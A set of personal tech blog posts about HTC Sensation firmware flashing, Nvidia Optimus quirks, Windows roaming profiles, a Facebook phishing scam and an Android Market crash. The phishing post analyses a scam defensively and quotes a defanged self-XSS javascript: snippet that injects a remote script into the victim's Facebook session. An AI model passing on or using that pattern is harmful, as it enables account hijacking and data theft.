HTC Sensation (4G) 1.45.401.2 OTA Update

This week, the HTC Sensation (Pyramid) is being blessed with an OTA update that brings Android Gingerbread 2.3.4 and has been reported to fix the HTC Sense lag issues and generally boost the interactive performance of the device. It’s also suspected that this update prepares the bootloader to be unlockable, because updating to this OTA release prints a “***LOCKED***” text at the top of the bootloader screen.

For those of us that are running a custom ROM, or just have your device rooted, you may have already be running 2.3.4, but may be wondering if you could update your bootloader without losing S-Off or root access. The answer is YES!

I’ve attached to this post the extracted “” from the OTA update, which contains the updated bootloader (HBOOT 1.18.0000), radio (10.56.9035.00U_10.14.9035.01_M), and a bunch of other firmwares (pg2fs_spcustom, rcdata, rpm, sbl2, tz). THIS PACKAGE IS MEANT FOR CUSTOM ROM USERS ONLY – I’ve removed the stock HTC kernel and recovery images, assuming that you have installed your own (2.3.4 compatible kernel of your choice, Clockworkmod Recovery). Rename the ZIP file to, place it into the root of your SD card, and reboot into the bootloader to update:

Because this firmware update includes a new radio, I’ve also attached the corresponding radio interface library (RIL) for the radio included in this update. This one must be flashed via recovery, with the /system partition mounted:

Standard disclaimer: I’m not responsible for anything that happens to your device. You’ve been warned. Enjoy!

nVidia Optimus Giving You The Blues?

With a new burst of laptops this year, there is a good handful of them that now come with nVidia Optimus.

What is this technology? In a nutshell, nVidia Optimus is a technology currently for laptops that allows the use of both the onboard Intel GPU and the nVidia GPU simultaneously, depending on the processing needs of the running applications. When an application needs advanced hardware acceleration, it powers up the nVidia GPU from a “sleep” state. This dynamic use of the nVidia GPU allows for lower power consumption (and thus better battery life) because most of the productivity applications or the even the windows interface itself does not need the full power of an nVidia GPU.

There are a few “gotchas” to this technology, however. The first is that you must be running Windows 7 ™ with supported drivers in order to take advantage of this. If you aren’t, then you might be stuck using the Intel GPU, depending on how your system manufacturer routed the video on your motherboard. The second is that some applications don’t automatically run with the nVidia GPU. You might need to manually configure the application to run using the higher power GPU. The final one that I am aware of is that the use of currently available GPU monitoring software or widgets can severely impede hardware performance.

The typical GPU monitoring applications that cause some hardware quirks are the ones that periodically poll the GPU to obtain its temperature, clock speed, load, memory usage, etc. So far, it has caused the following:

    On the Dell XPS 17 (L702X), non-3D edition, running a GPU monitoring app or widget caused the fan to switch on (at high speed) and off. This in turn caused the CPU & GPU temperatures to go on a roller coaster ride, going sky high then back down, inverse to the fan’s state.
    On my Dell Precision M6600, running a GPU monitoring app or widget reduced my battery life by 40 some minutes!

This is all happening because the monitoring app causes the driver to wake up the GPU in order to poll for its status. So users, beware!

Have any other weird issues related to nVidia Optimus? Post a comment below.

Roaming Profiles: From Windows XP to Vista / Windows 7

Quick, short post today, but this will probably save you a lot of time searching for a pretty much non-existent answer to a new “feature” introduced in roaming profiles for Windows Vista and Windows 7. It cost me an hour to figure this out. Hopefully you’ll see this and solve the issue in a jiffy…

You join your brand new Vista or Win7 machines to a your domain and then try logging in with a roaming user account and get a popup notification error saying that Windows has logged you in with a temporary profile. You look in the event viewer and see the following:

All the permissions are set correctly for the share and folders for the roaming profile and the user can create files in the roaming profile folder, but the stupid “Access Denied” error message is still there.

Your roaming profile path MUST have a trailing slash at the end now… Likewise:

What the hell, Microsoft? All along you’re lax (*nix had this enforced all along) and now you change it. At least let us know? Please and thank you…

On a slightly different note, I also suggest that you set the following Group Policies to make your sysadmin life easier:
Computer Config\Policies\Administrative Templates\System\Logon --> Always wait for network at computer startup and logon [Enabled]
Computer Config\Policies\Administrative Templates\System\User Profiles --> Add the Administrators security group to the roaming user profile share [Enabled]
Computer Config\Policies\Administrative Templates\System\User Profiles --> Wait for remote user profile --> [Enabled]

As usual, cheers.

Facebook Security: An Old Phishing Trick, Revived & Analyzed.

In the past, you may remember that I’ve written about many instances where Facebook users were falling for a trick where a link get’s posted on their wall asking them to click a fake link in order to gain access so some “cool” feature such as getting a free iPad, gaining access and see other people’s hidden profile information, or get free male enhancements. They all work on the same principle: a user clicks on a link that takes them to a Facebook page, which instructs them to paste a line JavaScript code into their URL bar and press enter. In turn, this tells the user’s browser to run code that can do pretty much whatever it wants to do with your Facebook session or anything else you might have open, for that matter.

For all you non-tech users out there: DON’T EVER, paste or click any link without first checking out what it may do. And as always, if it sounds too good to be true, IT PROBABLY IS!

In the rest of this post, I’ll analyze in detail, one particular phishing scheme that happened to explode all over Facebook in the last 24-ish hours. Keep in mind, most of the phishing right now is based on this. The rest of the Facebook phishing is done by sending you a fake e-mail with a link to a fake Facebook login page, which then steals your e-mail address and password.

The scam starts with a sent to you, either by e-mail, and/or posted on your wall. It looks something like this:


The link posted takes you to a facebook page that looks like this:


In this particular Facebook page, it redirects you to a 3rd party domain (, which takes you back to another Facebook page that looks exactly like the previous. This is done to retain a Facebook page that they can use to redirect to additional, different Facebook pages, should it be reported. In other words, if the malicious page gets reported, it would be the second one, allowing the original page to be retained and modified. I found this one because NoScript (Firefox Plugin) blocks scripts by default:


This second Facebook page looks like this:


And this one is the one that instructs you to copy and paste some code to run in your browser’s URL bar. Very bad idea for the end user. Let’s take a closer look at the code itself (this one has been de-fanged – refang at your own risk):

javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script)).src=//,b.body.appendChild(a) void(0) /* FACEBOOK PROFILE VIEWERS */

This basically tells the browser to execute whatever scripts lie at with a few parameters from your current Facebook session, most prominently your friends list, but can also include your profile information (e-mail address, residence, phone numbers), or even your Facebook credentials. This kind of attack falls under the category of “User Induced Cross Site Scripting (XSS)”.

A few other interesting notes:’s index page simply redirects the user to the second Facebook page, via a JavaScript.
    Both and have the same IP address (, are registered from eNom, Inc, and are hosted by, as evidenced by their nameservers, NS2767.HOSTGATOR.COM, and NS2768.HOSTGATOR.COM. Private registration of these 2 domains prevent identifying details from being revealed. is the actual domain where the malicious scripts are run from.


Android Market 2.3 Force Close / Crash

I was stumped by this issue for a long time and was only recently able to find the solution using the Android SDK’s “adb logcat” function to reveal the system logs.

Essentially, you try to install or update an app from the Android market, and it crashes with a force close message. Reading around on the forums over at and other places suggest the following:

Proposed Solution #1
Settings -> Applications -> Manage Applications -> All -> Market :: Hit “Uninstall” to uninstall updates, essentially roll back the version to the one that came with your ROM.

Proposed Solution #2
Settings -> Applications -> Manage Applications -> All -> Market :: Hit “Clear Data” and “Clear Cache”

Proposed Solution #3 (mailny for cyanogenmod or ROMs that don’t come with the Google apps installed)
Boot into recovery and reinstall the gapps zip file.

Proposed Solution #4
Search for the Market app’s apk file and install it using “adb install -r appname.apk”. Make sure you have Settings -> Applications -> Install from Unknown Sources enabled.

Proposed Solution #5
Wipe all data / factory reset. Obviously #sadface. Or #angryface.

I tried all of the suggested solutions above, except the full reset. Obviously should be something that doesn’t require that drastic of a change… but none of the other solutions worked. So I turned on usb debugging, ran “adb logcat”, and then reproduced the market force close / crash. Deep in the hundreds of lines of code, I found this:

E/AndroidRuntime( 2975): FATAL EXCEPTION: Download Service
E/AndroidRuntime( 2975): java.lang.SecurityException: Requires VIBRATE permission

What the hell? Yes, I thought the same thing… Why does the market place require vibrate permissions? For notifications maybe… but even more interesting is the fact that the vibrate permissions are required for (the music player), which force closes before the market app.

The solution? I had a profile that turned vibrations off for the default “Media” apps group (be default it only has the Music app in it). Switching it to “No override” fixed the crashing / force close issue in a jiffy.

What’s up with this funky fix? And why does the Android Market need to call the Music app with vibrate permissions? Beats me… too bad Google’s apps are closed source.

EDIT: Known affected Market versions (by me), as of writing: 2.3.2, 2.3.3, 2.3.4.